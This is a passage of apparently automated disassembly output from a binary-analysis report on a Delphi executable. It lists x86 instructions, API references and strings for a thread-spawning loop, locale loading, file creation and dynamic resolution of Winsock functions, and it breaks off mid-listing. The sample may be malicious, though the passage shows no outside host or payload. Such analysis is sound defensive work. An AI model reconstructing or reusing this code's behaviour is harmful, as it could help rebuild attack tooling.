004292C1 mov dword ptr fs:[eax], esp
004292C4 lea eax, dword ptr [ebp-24h]
004292C7 push eax
004292C8 lea edx, dword ptr [ebp-28h]
004292CB mov eax, dword ptr [ebp-04h]
004292CE mov ecx, dword ptr [eax]
004292D0 call dword ptr [ecx+1Ch]
004292D3 mov eax, dword ptr [ebp-28h]
004292D6 mov ecx, 00000001h
004292DB xor edx, edx
004292DD call 004048D8h
004292E2 mov eax, dword ptr [ebp-24h]
004292E5 call 00422574h
004292EA mov dword ptr [0042DA68h], eax
004292EF xor eax, eax
004292F1 pop edx
004292F3 pop ecx Count = 2
004292F4 mov dword ptr fs:[eax], edx
004292F7 jmp 00429303h
00429303 xor eax, eax xrefs 004292F7
00429305 push ebp
00429306 push 00429349h
0042930B push dword ptr fs:[eax]
0042930E mov dword ptr fs:[eax], esp
00429311 lea eax, dword ptr [ebp-2Ch]
00429314 push eax
00429315 lea edx, dword ptr [ebp-30h]
00429318 mov eax, dword ptr [ebp-04h]
0042931B mov ecx, dword ptr [eax]
0042931D call dword ptr [ecx+1Ch]
00429320 mov eax, dword ptr [ebp-30h]
00429323 mov ecx, 00000001h
00429328 mov edx, 00000002h
0042932D call 004048D8h
00429332 mov eax, dword ptr [ebp-2Ch]
00429335 call 00422574h
0042933A mov dword ptr [0042DA8Ch], eax
0042933F xor eax, eax
00429341 pop edx
00429343 pop ecx Count = 2
00429344 mov dword ptr fs:[eax], edx
00429347 jmp 0042935Dh
0042935D lea eax, dword ptr [ebp-34h] xrefs 00429347
00429360 push eax
00429361 lea edx, dword ptr [ebp-38h]
00429364 mov eax, dword ptr [ebp-04h]
00429367 mov ecx, dword ptr [eax]
00429369 call dword ptr [ecx+1Ch]
0042936C mov eax, dword ptr [ebp-38h]
0042936F call 00404678h
00429374 sub eax, 04h
00429377 push eax
00429378 lea edx, dword ptr [ebp-3Ch]
0042937B mov eax, dword ptr [ebp-04h]
0042937E mov ecx, dword ptr [eax]
00429380 call dword ptr [ecx+1Ch]
00429383 mov eax, dword ptr [ebp-3Ch]
00429386 mov edx, 00000004h
0042938B pop ecx
0042938C call 004048D8h
00429391 mov edx, dword ptr [ebp-34h]
00429394 mov eax, dword ptr [ebp-04h]
00429397 mov ecx, dword ptr [eax]
00429399 call dword ptr [ecx+2Ch]
0042939C xor eax, eax
0042939E push ebp
0042939F push 004293F5h
004293A4 push dword ptr fs:[eax]
004293A7 mov dword ptr fs:[eax], esp
004293AA lea eax, dword ptr [ebp-40h]
004293AD push eax
004293AE lea edx, dword ptr [ebp-44h]
004293B1 mov eax, dword ptr [ebp-04h]
004293B4 mov ecx, dword ptr [eax]
004293B6 call dword ptr [ecx+1Ch]
004293B9 mov edx, dword ptr [ebp-44h]
004293BC mov eax, 004297B0h
004293C1 call 00404960h
004293C6 dec eax
004293C7 push eax
004293C8 lea edx, dword ptr [ebp-48h]
004293CB mov eax, dword ptr [ebp-04h]
004293CE mov ecx, dword ptr [eax]
004293D0 call dword ptr [ecx+1Ch]
004293D3 mov eax, dword ptr [ebp-48h]
004293D6 xor edx, edx
004293D8 pop ecx
004293D9 call 004048D8h
004293DE mov eax, dword ptr [ebp-40h]
004293E1 call 00422574h
004293E6 mov dword ptr [0042DA74h], eax
004293EB xor eax, eax
004293ED pop edx
004293EF pop ecx Count = 2
004293F0 mov dword ptr fs:[eax], edx
004293F3 jmp 00429406h
00429406 lea eax, dword ptr [ebp-4Ch] xrefs 004293F3
00429409 push eax
0042940A lea edx, dword ptr [ebp-50h]
0042940D mov eax, dword ptr [ebp-04h]
00429410 mov ecx, dword ptr [eax]
00429412 call dword ptr [ecx+1Ch]
00429415 mov eax, dword ptr [ebp-50h]
00429418 call 00404678h
0042941D mov ebx, eax
0042941F lea edx, dword ptr [ebp-54h]
00429422 mov eax, dword ptr [ebp-04h]
00429425 mov ecx, dword ptr [eax]
00429427 call dword ptr [ecx+1Ch]
0042942A mov edx, dword ptr [ebp-54h]
0042942D mov eax, 004297B0h
00429432 call 00404960h
00429437 sub ebx, eax
00429439 push ebx
0042943A lea edx, dword ptr [ebp-58h]
0042943D mov eax, dword ptr [ebp-04h]
00429440 mov ecx, dword ptr [eax]
00429442 call dword ptr [ecx+1Ch]
00429445 mov edx, dword ptr [ebp-58h]
00429448 mov eax, 004297B0h
0042944D call 00404960h
00429452 inc eax
00429453 push eax
00429454 lea edx, dword ptr [ebp-5Ch]
00429457 mov eax, dword ptr [ebp-04h]
0042945A mov ecx, dword ptr [eax]
0042945C call dword ptr [ecx+1Ch]
0042945F mov eax, dword ptr [ebp-5Ch]
00429462 pop edx
00429463 pop ecx
00429464 call 004048D8h
00429469 mov edx, dword ptr [ebp-4Ch]
0042946C mov eax, dword ptr [ebp-04h]
0042946F mov ecx, dword ptr [eax]
00429471 call dword ptr [ecx+2Ch]
00429474 xor eax, eax
00429476 mov dword ptr [ebp-18h], eax
00429479 lea eax, dword ptr [ebp-14h]
0042947C push eax
0042947D lea edx, dword ptr [ebp-60h]
00429480 mov eax, dword ptr [ebp-04h]
00429483 mov ecx, dword ptr [eax]
00429485 call dword ptr [ecx+1Ch]
00429488 mov eax, dword ptr [ebp-60h]
0042948B mov ecx, 00000001h
00429490 mov edx, dword ptr [ebp-18h]
00429493 call 004048D8h
00429498 jmp 004294BCh
0042949A inc dword ptr [ebp-18h] xrefs 004294C9, 004294D8, 004294E7, 004294F6, 00429505, 00429514, 00429523, 00429536, 00429549, 0042955C
0042949D lea eax, dword ptr [ebp-14h]
004294A0 push eax
004294A1 lea edx, dword ptr [ebp-64h]
004294A4 mov eax, dword ptr [ebp-04h]
004294A7 mov ecx, dword ptr [eax]
004294A9 call dword ptr [ecx+1Ch]
004294AC mov eax, dword ptr [ebp-64h]
004294AF mov ecx, 00000001h
004294B4 mov edx, dword ptr [ebp-18h]
004294B7 call 004048D8h
004294BC mov eax, dword ptr [ebp-14h] xrefs 00429498
004294BF mov edx, 004297BCh
004294C4 call 004047C4h
004294C9 je 0042949Ah
004294CB mov eax, dword ptr [ebp-14h]
004294CE mov edx, 004297C8h
004294D3 call 004047C4h
004294D8 je 0042949Ah
004294DA mov eax, dword ptr [ebp-14h]
004294DD mov edx, 004297D4h
004294E2 call 004047C4h
004294E7 je 0042949Ah
004294E9 mov eax, dword ptr [ebp-14h]
004294EC mov edx, 004297E0h
004294F1 call 004047C4h
004294F6 je 0042949Ah
004294F8 mov eax, dword ptr [ebp-14h]
004294FB mov edx, 004297ECh
00429500 call 004047C4h
00429505 je 0042949Ah
00429507 mov eax, dword ptr [ebp-14h]
0042950A mov edx, 004297F8h
0042950F call 004047C4h
00429514 je 0042949Ah
00429516 mov eax, dword ptr [ebp-14h]
00429519 mov edx, 00429804h
0042951E call 004047C4h
00429523 je 0042949Ah
00429529 mov eax, dword ptr [ebp-14h]
0042952C mov edx, 00429810h
00429531 call 004047C4h
00429536 je 0042949Ah
0042953C mov eax, dword ptr [ebp-14h]
0042953F mov edx, 0042981Ch
00429544 call 004047C4h
00429549 je 0042949Ah
0042954F mov eax, dword ptr [ebp-14h]
00429552 mov edx, 00429828h
00429557 call 004047C4h
0042955C je 0042949Ah
00429562 dec dword ptr [ebp-18h]
00429565 xor eax, eax
00429567 push ebp
00429568 push 004295A4h
0042956D push dword ptr fs:[eax]
00429570 mov dword ptr fs:[eax], esp
00429573 lea eax, dword ptr [ebp-68h]
00429576 push eax
00429577 lea edx, dword ptr [ebp-6Ch]
0042957A mov eax, dword ptr [ebp-04h]
0042957D mov ecx, dword ptr [eax]
0042957F call dword ptr [ecx+1Ch]
00429582 mov eax, dword ptr [ebp-6Ch]
00429585 mov ecx, dword ptr [ebp-18h]
00429588 xor edx, edx
0042958A call 004048D8h
0042958F mov eax, dword ptr [ebp-68h]
00429592 call 00422574h
00429597 mov dword ptr [ebp-08h], eax
0042959A xor eax, eax
0042959C pop edx
0042959E pop ecx Count = 2
0042959F mov dword ptr fs:[eax], edx
004295A2 jmp 004295B4h
004295B4 lea eax, dword ptr [ebp-10h] xrefs 004295A2
004295B7 push eax
004295B8 lea edx, dword ptr [ebp-70h]
004295BB mov eax, dword ptr [ebp-04h]
004295BE mov ecx, dword ptr [eax]
004295C0 call dword ptr [ecx+1Ch]
004295C3 mov eax, dword ptr [ebp-70h]
004295C6 call 00404678h
004295CB sub eax, dword ptr [ebp-18h]
004295CE sub eax, 02h
004295D1 push eax
004295D2 lea edx, dword ptr [ebp-74h]
004295D5 mov eax, dword ptr [ebp-04h]
004295D8 mov ecx, dword ptr [eax]
004295DA call dword ptr [ecx+1Ch]
004295DD mov eax, dword ptr [ebp-74h]
004295E0 mov edx, dword ptr [ebp-18h]
004295E3 inc edx
004295E4 pop ecx
004295E5 call 004048D8h
004295EA xor eax, eax
004295EC push ebp
004295ED push 0042970Eh
004295F2 push dword ptr fs:[eax]
004295F5 mov dword ptr fs:[eax], esp
004295F8 cmp dword ptr [ebp-10h], 00000000h
004295FC je 004296FAh
00429602 cmp dword ptr [0042DA74h], 00000000h
00429609 jng 004296FAh
0042960F cmp dword ptr [0042DA68h], 00000000h
00429616 jne 004296FAh
0042961C mov edx, dword ptr [ebp-10h]
0042961F mov eax, dword ptr [0042DA80h] 00962138
00429624 mov ecx, dword ptr [eax]
00429626 call dword ptr [ecx+2Ch]
00429629 mov eax, dword ptr [0042DA80h] 00962138
0042962E mov edx, dword ptr [eax]
00429630 call dword ptr [edx+14h]
00429633 mov dword ptr [0042DA70h], eax
00429638 mov eax, dword ptr [0042DA80h] 00962138
0042963D mov edx, dword ptr [eax]
0042963F call dword ptr [edx+14h]
00429642 test eax, eax
00429644 jng 004296EEh
0042964A xor eax, eax
0042964C mov dword ptr [0042DA68h], eax
00429651 mov dword ptr [0042DA78h], 00000001h
0042965B xor eax, eax
0042965D mov dword ptr [0042DA7Ch], eax
00429662 mov eax, dword ptr [0042DA6Ch] 00000000
00429667 cmp eax, dword ptr [0042DA74h] 00000000
0042966D jnl 00429704h
00429673 xor eax, eax xrefs 004296EA
00429675 push ebp
00429676 push 004296C9h
0042967B push dword ptr fs:[eax]
0042967E mov dword ptr fs:[eax], esp
00429681 cmp dword ptr [0042DA7Ch], 01h
00429688 jne 0042969Ah
0042968A push 00000001h xrefs 00429698
0042968C call 00421B84h
00429691 cmp dword ptr [0042DA7Ch], 01h
00429698 je 0042968Ah
0042969A mov dword ptr [0042DA7Ch], 00000001h xrefs 00429688
004296A4 xor ecx, ecx
004296A6 mov dl, 01h
004296A8 mov eax, dword ptr [00421B0Ch] 00421B58
004296AD call 00413184h
004296B2 mov edx, dword ptr [0042DA6Ch] 00000000
004296B8 mov dword ptr [0042CAC8h+edx*4], eax
004296BF xor eax, eax
004296C1 pop edx
004296C3 pop ecx Count = 2
004296C4 mov dword ptr fs:[eax], edx
004296C7 jmp 004296D9h
004296D9 inc dword ptr [0042DA6Ch] xrefs 004296C7
004296DF mov eax, dword ptr [0042DA6Ch] 00000000
004296E4 cmp eax, dword ptr [0042DA74h] 00000000
004296EA jl 00429673h
004296EC jmp 00429704h
004296EE mov dword ptr [0042DA68h], 00000001h xrefs 00429644
004296F8 jmp 00429704h
004296FA mov dword ptr [0042DA68h], 00000001h xrefs 004295FC, 00429609, 00429616
00429704 xor eax, eax xrefs 004296F8, 0042966D, 004296EC
00429706 pop edx
00429708 pop ecx Count = 2
00429709 mov dword ptr fs:[eax], edx
0042970C jmp 00429734h
00429724 mov dword ptr [0042DA68h], 00000001h xrefs 004292B0
0042972E mov eax, dword ptr [ebp-0Ch]
00429731 mov dword ptr [ebp-08h], eax
00429734 mov dl, 01h xrefs 0042970C, 00429722
00429736 mov eax, dword ptr [ebp-04h]
00429739 mov ecx, dword ptr [eax]
0042973B call dword ptr [ecx-04h]
0042973E xor eax, eax
00429740 pop edx
00429742 pop ecx Count = 2
00429743 mov dword ptr fs:[eax], edx
00429746 jmp 00429752h
00429752 imul eax, dword ptr [ebp-08h], 000003E7h xrefs 00429746
00429759 push eax
0042975A call 00421B84h Sleep@KERNEL32.DLL (Hidden Import)
0042975F jmp 00429260h
Function 0040551C, API count: 4, instr count: 184
APIs
    • GetModuleHandleA.KERNEL32, ref: 00405381
    • GetProcAddress.KERNEL32, ref: 00405392
    • lstrcpyn.KERNEL32, ref: 00405426
    • FindFirstFileA.KERNEL32, ref: 0040546E
    • FindClose.KERNEL32, ref: 0040547B
    • lstrlen.KERNEL32, ref: 00405487
  • GetModuleFileNameA.KERNEL32, ref: 00405538
  • GetThreadLocale.KERNEL32, ref: 00405645
  • GetLocaleInfoA.KERNEL32, ref: 0040564B
  • LoadLibraryExA.KERNEL32, ref: 00405705
Strings
  • Software\Borland\Locales, va: 0040574C
  • Software\Borland\Delphi\Locales, va: 00405768
Address Instruction Meta Information
0040551C push ebp xrefs 00405307
0040551D mov ebp, esp
0040551F add esp, FFFFFEE0h
00405525 push ebx
00405526 push esi
00405527 mov dword ptr [ebp-04h], eax
0040552A push 00000105h
0040552F lea eax, dword ptr [ebp-0000011Dh]
00405535 push eax
00405536 push 00000000h
00405538 call 00401258h GetModuleFileNameA@KERNEL32.DLL (Hidden Import)
0040553D mov byte ptr [ebp-12h], 00000000h
00405541 lea eax, dword ptr [ebp-08h]
00405544 push eax
00405545 push 000F0019h
0040554A push 00000000h
0040554C push 0040574Ch ASCII "Software\Borland\Locales"
00405551 push 80000001h
00405556 call 004012B0h
0040555B test eax, eax
0040555D je 0040559Fh
0040555F lea eax, dword ptr [ebp-08h]
00405562 push eax
00405563 push 000F0019h
00405568 push 00000000h
0040556A push 0040574Ch ASCII "Software\Borland\Locales"
0040556F push 80000002h
00405574 call 004012B0h
00405579 test eax, eax
0040557B je 0040559Fh
0040557D lea eax, dword ptr [ebp-08h]
00405580 push eax
00405581 push 000F0019h
00405586 push 00000000h
00405588 push 00405768h ASCII "Software\Borland\Delphi\Locales"
0040558D push 80000001h
00405592 call 004012B0h
00405597 test eax, eax
00405599 jne 00405628h
0040559F xor eax, eax xrefs 0040555D, 0040557B
004055A1 push ebp
004055A2 push 00405621h
004055A7 push dword ptr fs:[eax]
004055AA mov dword ptr fs:[eax], esp
004055AD mov dword ptr [ebp-18h], 00000005h
004055B4 lea eax, dword ptr [ebp-0000011Dh]
004055BA mov edx, 00000105h
004055BF call 00405364h
004055C4 lea eax, dword ptr [ebp-18h]
004055C7 push eax
004055C8 lea eax, dword ptr [ebp-12h]
004055CB push eax
004055CE push 00000000h Count = 2
004055D0 lea eax, dword ptr [ebp-0000011Dh]
004055D6 push eax
004055D7 mov eax, dword ptr [ebp-08h]
004055DA push eax
004055DB call 004012B8h
004055E0 test eax, eax
004055E2 je 00405606h
004055E4 lea eax, dword ptr [ebp-18h]
004055E7 push eax
004055E8 lea eax, dword ptr [ebp-12h]
004055EB push eax
004055EE push 00000000h Count = 2
004055F0 push 00405788h
004055F5 mov eax, dword ptr [ebp-08h]
004055F8 push eax
004055F9 call 004012B8h
004055FE test eax, eax
00405600 je 00405606h
00405602 mov byte ptr [ebp-12h], 00000000h
00405606 mov byte ptr [ebp-0Eh], 00000000h xrefs 004055E2, 00405600
0040560A xor eax, eax
0040560C pop edx
0040560E pop ecx Count = 2
0040560F mov dword ptr fs:[eax], edx
00405612 push 00405628h
00405617 mov eax, dword ptr [ebp-08h] xrefs 00405626
0040561A push eax
0040561B call 004012A8h
00405620 ret function end
00405628 push 00000105h xrefs 00405599
0040562D mov eax, dword ptr [ebp-04h]
00405630 push eax
00405631 lea eax, dword ptr [ebp-0000011Dh]
00405637 push eax
00405638 call 00401290h
0040563D push 00000005h
0040563F lea eax, dword ptr [ebp-0Dh]
00405642 push eax
00405643 push 00000003h
00405645 call 00401278h GetThreadLocale@KERNEL32.DLL (Hidden Import)
0040564A push eax
0040564B call 00401250h GetLocaleInfoA@KERNEL32.DLL (Hidden Import)
00405650 xor esi, esi
00405652 cmp byte ptr [ebp-0000011Dh], 00000000h
00405659 je 00405742h
0040565F cmp byte ptr [ebp-0Dh], 00000000h
00405663 jne 0040566Fh
00405665 cmp byte ptr [ebp-12h], 00000000h
00405669 je 00405742h
0040566F lea eax, dword ptr [ebp-0000011Dh] xrefs 00405663
00405675 push eax
00405676 call 00401298h
0040567B mov ebx, eax
0040567D lea eax, dword ptr [ebp-0000011Dh]
00405683 add ebx, eax
00405685 jmp 00405688h
00405687 dec ebx xrefs 00405695
00405688 cmp byte ptr [ebx], 0000002Eh xrefs 00405685
0040568B je 00405697h
0040568D lea eax, dword ptr [ebp-0000011Dh]
00405693 cmp ebx, eax
00405695 jne 00405687h
00405697 lea eax, dword ptr [ebp-0000011Dh] xrefs 0040568B
0040569D cmp ebx, eax
0040569F je 00405742h
004056A5 inc ebx
004056A6 cmp byte ptr [ebp-12h], 00000000h
004056AA je 004056D4h
004056AC mov edx, ebx
004056AE sub edx, eax
004056B0 mov eax, 00000105h
004056B5 sub eax, edx
004056B7 push eax
004056B8 lea eax, dword ptr [ebp-12h]
004056BB push eax
004056BC push ebx
004056BD call 00401290h
004056C2 push 00000002h
004056C4 push 00000000h
004056C6 lea eax, dword ptr [ebp-0000011Dh]
004056CC push eax
004056CD call 00401280h
004056D2 mov esi, eax
004056D4 test esi, esi xrefs 004056AA
004056D6 jne 00405742h
004056D8 cmp byte ptr [ebp-0Dh], 00000000h
004056DC je 00405742h
004056DE lea eax, dword ptr [ebp-0000011Dh]
004056E4 mov edx, ebx
004056E6 sub edx, eax
004056E8 mov eax, 00000105h
004056ED sub eax, edx
004056EF push eax
004056F0 lea eax, dword ptr [ebp-0Dh]
004056F3 push eax
004056F4 push ebx
004056F5 call 00401290h
004056FA push 00000002h
004056FC push 00000000h
004056FE lea eax, dword ptr [ebp-0000011Dh]
00405704 push eax
00405705 call 00401280h LoadLibraryExA@KERNEL32.DLL (Hidden Import)
0040570A mov esi, eax
0040570C test esi, esi
0040570E jne 00405742h
00405710 mov byte ptr [ebp-0Bh], 00000000h
00405714 lea eax, dword ptr [ebp-0000011Dh]
0040571A mov edx, ebx
0040571C sub edx, eax
0040571E mov eax, 00000105h
00405723 sub eax, edx
00405725 push eax
00405726 lea eax, dword ptr [ebp-0Dh]
00405729 push eax
0040572A push ebx
0040572B call 00401290h
00405730 push 00000002h
00405732 push 00000000h
00405734 lea eax, dword ptr [ebp-0000011Dh]
0040573A push eax
0040573B call 00401280h
00405740 mov esi, eax
00405742 mov eax, esi xrefs 00405659, 0040569F, 004056D6, 004056DC, 0040570E, 00405669
00405744 pop esi
00405745 pop ebx
00405746 mov esp, ebp
00405748 pop ebp
00405749 ret function end
Function 00403094, API count: 1, instr count: 69
APIs
  • CreateFileA.KERNEL32, ref: 0040312F
Address Instruction Meta Information
00403094 push ebx xrefs 0040318A, 00403195
00403095 push esi
00403096 push edi
00403097 mov esi, edx
00403099 mov edi, ecx
0040309B xor edx, edx
0040309D mov ebx, eax
0040309F mov dx, word ptr [eax+04h]
004030A3 sub edx, 0000D7B0h
004030A9 je 004030C0h
004030AB cmp edx, 03h
004030AE ja 00403156h
004030B4 call dword ptr [ebx+24h]
004030B7 test eax, eax
004030B9 je 004030C0h
004030BB call 00402810h
004030C0 mov word ptr [ebx+04h], D7B3h xrefs 004030A9, 004030B9
004030C6 mov dword ptr [ebx+08h], esi
004030C9 mov dword ptr [ebx+24h], 0040306Ch
004030D0 mov dword ptr [ebx+1Ch], 00402AC0h
004030D7 cmp byte ptr [ebx+48h], 00000000h
004030DB je 0040313Dh
004030DD mov eax, C0000000h
004030E2 mov dl, byte ptr [0042B00Ch] 02
004030E8 and edx, 70h
004030EB shr edx, 02h
004030EE mov edx, dword ptr [edx+0042B06Ch]
004030F4 mov ecx, 00000002h
004030F9 sub edi, 03h
004030FC je 0040311Fh
004030FE mov ecx, 00000003h
00403103 inc edi
00403104 je 0040311Fh
00403106 mov eax, 40000000h
0040310B inc edi
0040310C mov word ptr [ebx+04h], D7B2h
00403112 je 0040311Fh
00403114 mov eax, 80000000h
00403119 mov word ptr [ebx+04h], D7B1h
0040311F push 00000000h xrefs 004030FC, 00403104, 00403112
00403121 push 00000080h
00403126 push ecx
00403127 push 00000000h
00403129 push edx
0040312A push eax
0040312B lea eax, dword ptr [ebx+48h]
0040312E push eax
0040312F call 004011A8h CreateFileA@KERNEL32.DLL (Hidden Import)
00403134 cmp eax, FFFFFFFFh xrefs 00403154
00403137 je 0040315Dh
00403139 mov dword ptr [ebx], eax
0040313B jmp 0040316Dh
0040313D mov dword ptr [ebx+24h], 00402AC0h xrefs 004030DB
00403144 cmp edi, 03h
00403147 je 0040314Dh
00403149 push FFFFFFF6h
0040314B jmp 0040314Fh
0040314D push FFFFFFF5h xrefs 00403147
0040314F call 004011C0h xrefs 0040314B
00403154 jmp 00403134h
00403156 mov eax, 00000066h xrefs 004030AE
0040315B jmp 00403168h
0040315D mov word ptr [ebx+04h], D7B0h xrefs 00403137
00403163 call 00401248h
00403168 call 00402810h xrefs 0040315B
0040316D pop edi xrefs 0040313B
0040316E pop esi
0040316F pop ebx
00403170 ret function end
Function 004016B4, API count: 0, instr count: 54
Address Instruction Meta Information
004016B4 push ebx xrefs 004017F5, 0040193E
004016B5 push esi
004016B6 push edi
004016B7 push ebp
004016B8 add esp, FFFFFFF4h
004016BB mov dword ptr [esp+04h], ecx
004016BF mov dword ptr [esp], edx
004016C2 mov edx, eax
004016C4 mov ebp, edx
004016C6 and ebp, FFFFF000h
004016CC add edx, dword ptr [esp]
004016CF add edx, 00000FFFh
004016D5 and edx, FFFFF000h
004016DB mov dword ptr [esp+08h], edx
004016DF mov eax, dword ptr [esp+04h]
004016E3 mov dword ptr [eax], ebp
004016E5 mov eax, dword ptr [esp+08h]
004016E9 sub eax, ebp
004016EB mov edx, dword ptr [esp+04h]
004016EF mov dword ptr [edx+04h], eax
004016F2 mov esi, dword ptr [0042C5E4h] 001491FC
004016F8 jmp 00401736h
004016FA mov ebx, dword ptr [esi+08h] xrefs 0040173C
004016FD mov edi, dword ptr [esi+0Ch]
00401700 add edi, ebx
00401702 cmp ebp, ebx
00401704 jbe 00401708h
00401706 mov ebx, ebp
00401708 cmp edi, dword ptr [esp+08h] xrefs 00401704
0040170C jbe 00401712h
0040170E mov edi, dword ptr [esp+08h]
00401712 cmp edi, ebx xrefs 0040170C
00401714 jbe 00401734h
00401716 push 00000004h
00401718 push 00001000h
0040171D sub edi, ebx
0040171F push edi
00401720 push ebx
00401721 call 0040134Ch
00401726 test eax, eax
00401728 jne 00401734h
0040172A mov eax, dword ptr [esp+04h]
0040172E xor edx, edx
00401730 mov dword ptr [eax], edx
00401732 jmp 0040173Eh
00401734 mov esi, dword ptr [esi] xrefs 00401714, 00401728
00401736 cmp esi, 0042C5E4h xrefs 004016F8
0040173C jne 004016FAh
0040173E add esp, 0Ch xrefs 00401732
00401741 pop ebp
00401742 pop edi
00401743 pop esi
00401744 pop ebx
00401745 ret function end
Function 00414670, API count: 1, instr count: 285
APIs
  • LoadLibraryA.KERNEL32, ref: 004146EF
Strings
  • WSAIoctl, va: 00414AC8
  • __WSAFDIsSet, va: 00414AD4
  • closesocket, va: 00414AE4
  • ioctlsocket, va: 00414AF0
  • WSAGetLastError, va: 00414AFC
  • WSAStartup, va: 00414B0C
  • WSACleanup, va: 00414B18
  • accept, va: 00414B24
  • bind, va: 00414B2C
  • connect, va: 00414B34
  • getpeername, va: 00414B3C
  • getsockname, va: 00414B48
  • getsockopt, va: 00414B54
  • htonl, va: 00414B60
  • htons, va: 00414B68
  • inet_addr, va: 00414B70
  • inet_ntoa, va: 00414B7C
  • listen, va: 00414B88
  • ntohl, va: 00414B90
  • ntohs, va: 00414B98
  • recv, va: 00414BA0
  • recvfrom, va: 00414BA8
  • select, va: 00414BB4
  • send, va: 00414BBC
  • sendto, va: 00414BC4
  • setsockopt, va: 00414BCC
  • shutdown, va: 00414BD8
  • socket, va: 00414BE4
  • gethostbyaddr, va: 00414BEC
  • gethostbyname, va: 00414BFC
  • getprotobyname, va: 00414C0C
  • getprotobynumber, va: 00414C1C
  • getservbyname, va: 00414C30
  • getservbyport, va: 00414C40
  • gethostname, va: 00414C50
  • getaddrinfo, va: 00414C5C
  • freeaddrinfo, va: 00414C68
  • getnameinfo, va: 00414C78
  • wship6.dll, va: 00414C84
  • ws2_32.dll, va: 00414ABC
Address Instruction Meta Information
00414670 push ebp
00414671 mov ebp, esp
00414673 add esp, FFFFFFF8h
00414676 push ebx
00414677 mov dword ptr [ebp-04h], eax
0041467A mov eax, dword ptr [ebp-04h]
0041467D call 00404868h
00414682 mov ebx, 0042B464h
00414687 xor eax, eax
00414689 push ebp
0041468A push 00414AA2h
0041468F push dword ptr fs:[eax]
00414692 mov dword ptr fs:[eax], esp
00414695 mov byte ptr [ebp-05h], 00000000h
00414699 mov byte ptr [0042C8A8h], 00000000h
004146A0 cmp dword ptr [ebp-04h], 00000000h
004146A4 jne 004146B3h
004146A6 lea eax, dword ptr [ebp-04h]
004146A9 mov edx, 00414ABCh ASCII "ws2_32.dll"
004146AE call 00404474h
004146B3 mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 004146A4
004146B8 call 00413914h
004146BD xor eax, eax
004146BF push ebp
004146C0 push 00414A85h
004146C5 push dword ptr fs:[eax]
004146C8 mov dword ptr fs:[eax], esp
004146CB cmp dword ptr [0042B460h], 00000000h
004146D2 jne 00414A5Dh
004146D8 mov byte ptr [0042C8A8h], 00000000h
004146DF mov byte ptr [0042C8A9h], 00000000h
004146E6 mov eax, dword ptr [ebp-04h]
004146E9 call 00404878h
004146EE push eax
004146EF call 00406244h LoadLibraryA@KERNEL32.DLL (Import)
004146F4 mov dword ptr [ebx], eax
004146F6 cmp dword ptr [ebx], 00000000h
004146F9 je 00414A61h
004146FF push 00414AC8h ASCII "WSAIoctl"
00414704 mov eax, dword ptr [ebx]
00414706 push eax
00414707 call 004061D4h
0041470C mov dword ptr [0042B45Ch], eax
00414711 push 00414AD4h ASCII "__WSAFDIsSet"
00414716 mov eax, dword ptr [ebx]
00414718 push eax
00414719 call 004061D4h
0041471E mov dword ptr [0042B458h], eax
00414723 push 00414AE4h ASCII "closesocket"
00414728 mov eax, dword ptr [ebx]
0041472A push eax
0041472B call 004061D4h
00414730 mov dword ptr [0042B438h], eax
00414735 push 00414AF0h ASCII "ioctlsocket"
0041473A mov eax, dword ptr [ebx]
0041473C push eax
0041473D call 004061D4h
00414742 mov dword ptr [0042B418h], eax
00414747 push 00414AFCh ASCII "WSAGetLastError"
0041474C mov eax, dword ptr [ebx]
0041474E push eax
0041474F call 004061D4h
00414754 mov dword ptr [0042B3D0h], eax
00414759 push 00414B0Ch ASCII "WSAStartup"
0041475E mov eax, dword ptr [ebx]
00414760 push eax
00414761 call 004061D4h
00414766 mov dword ptr [0042B3C8h], eax
0041476B push 00414B18h ASCII "WSACleanup"
00414770 mov eax, dword ptr [ebx]
00414772 push eax
00414773 call 004061D4h
00414778 mov dword ptr [0042B3CCh], eax
0041477D push 00414B24h ASCII "accept"
00414782 mov eax, dword ptr [ebx]
00414784 push eax
00414785 call 004061D4h
0041478A mov dword ptr [0042B440h], eax
0041478F push 00414B2Ch ASCII "bind"
00414794 mov eax, dword ptr [ebx]
00414796 push eax
00414797 call 004061D4h
0041479C mov dword ptr [0042B43Ch], eax
004147A1 push 00414B34h ASCII "connect"
004147A6 mov eax, dword ptr [ebx]
004147A8 push eax
004147A9 call 004061D4h
004147AE mov dword ptr [0042B434h], eax
004147B3 push 00414B3Ch ASCII "getpeername"
004147B8 mov eax, dword ptr [ebx]
004147BA push eax
004147BB call 004061D4h
004147C0 mov dword ptr [0042B430h], eax
004147C5 push 00414B48h ASCII "getsockname"
004147CA mov eax, dword ptr [ebx]
004147CC push eax
004147CD call 004061D4h
004147D2 mov dword ptr [0042B42Ch], eax
004147D7 push 00414B54h ASCII "getsockopt"
004147DC mov eax, dword ptr [ebx]
004147DE push eax
004147DF call 004061D4h
004147E4 mov dword ptr [0042B3F8h], eax
004147E9 push 00414B60h ASCII "htonl"
004147EE mov eax, dword ptr [ebx]
004147F0 push eax
004147F1 call 004061D4h
004147F6 mov dword ptr [0042B428h], eax
004147FB push 00414B68h ASCII "htons"
00414800 mov eax, dword ptr [ebx]
00414802 push eax
00414803 call 004061D4h
00414808 mov dword ptr [0042B424h], eax
0041480D push 00414B70h ASCII "inet_addr"
00414812 mov eax, dword ptr [ebx]
00414814 push eax
00414815 call 004061D4h
0041481A mov dword ptr [0042B420h], eax
0041481F push 00414B7Ch ASCII "inet_ntoa"
00414824 mov eax, dword ptr [ebx]
00414826 push eax
00414827 call 004061D4h
0041482C mov dword ptr [0042B41Ch], eax
00414831 push 00414B88h ASCII "listen"
00414836 mov eax, dword ptr [ebx]
00414838 push eax
00414839 call 004061D4h
0041483E mov dword ptr [0042B414h], eax
00414843 push 00414B90h ASCII "ntohl"
00414848 mov eax, dword ptr [ebx]
0041484A push eax
0041484B call 004061D4h
00414850 mov dword ptr [0042B410h], eax
00414855 push 00414B98h ASCII "ntohs"
0041485A mov eax, dword ptr [ebx]
0041485C push eax
0041485D call 004061D4h
00414862 mov dword ptr [0042B40Ch], eax
00414867 push 00414BA0h ASCII "recv"
0041486C mov eax, dword ptr [ebx]
0041486E push eax
0041486F call 004061D4h
00414874 mov dword ptr [0042B404h], eax
00414879 push 00414BA8h ASCII "recvfrom"
0041487E mov eax, dword ptr [ebx]
00414880 push eax
00414881 call 004061D4h
00414886 mov dword ptr [0042B408h], eax
0041488B push 00414BB4h ASCII "select"
00414890 mov eax, dword ptr [ebx]
00414892 push eax
00414893 call 004061D4h
00414898 mov dword ptr [0042B448h], eax
0041489D push 00414BBCh ASCII "send"
004148A2 mov eax, dword ptr [ebx]
004148A4 push eax
004148A5 call 004061D4h
